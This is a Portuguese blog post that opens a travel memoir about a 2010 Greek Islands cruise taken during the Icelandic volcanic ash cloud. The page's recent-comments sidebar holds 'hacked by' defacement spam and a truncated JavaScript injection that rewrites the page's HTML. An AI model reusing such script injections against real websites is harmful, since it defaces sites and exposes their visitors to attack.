Resolvi inserir o relato do cruzeiro às Ilhas Gregas neste livro, não porque simplesmente me tornei fã incondicional desta forma de viajar e tenha de contar todas as histórias relacionadas com os cruzeiros que fiz (e que até à data foram 14), mas porque esta viagem reveste-se de uma característica muito particular: realizou-se na altura em se espalhou a nuvem de cinzas do impronunciável vulcão islandês Eyjafjallajokull.

A oportunidade de efectuar este cruzeiro às Ilhas Gregas surgiu em Abril de 2010, para levar a cabo uma inspecção de um grupo já contratado por parte da Balay. Alguns dias antes da partida, estive no Porto para dar um Seminário sobre “Gestão de Marcas e Eventos” aos alunos da pós-graduação da Universidade Católica do Porto. Fiquei para jantar com a minha amiga Raquel Rodrigues, porque eu queria muito conhecer o Restaurante Buhle, dos também meus amigos Diana Pereira e Ricardo Monteiro.

Entre as óptimas iguarias e uma animada conversa, a Raquel revelou-me que teria imensa vontade de experimentar um cruzeiro. Desafiei-a na hora para me acompanhar na viagem de inspecção que teria de fazer dali a uma semana. E assim aconteceu.



Tags:

Facebook Like

Pub
Rubricas
Comentários recentes
Kd o vídeo?
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa...
HACKED BY BRIAN_POSIXHACKED BY BRIAN_POSIXHACKED B...
Hacked By Brian_posix !!SIC MULHER PWNED BY BPOSIX...
document.documentElement.innerHTML=unescape("Hacke...
Amei <3 mt
https://m.facebook.com/Veredictod1amor/insights/
Acabei de o receber, muito obrigada!
Pesquisar
 
blogs SAPO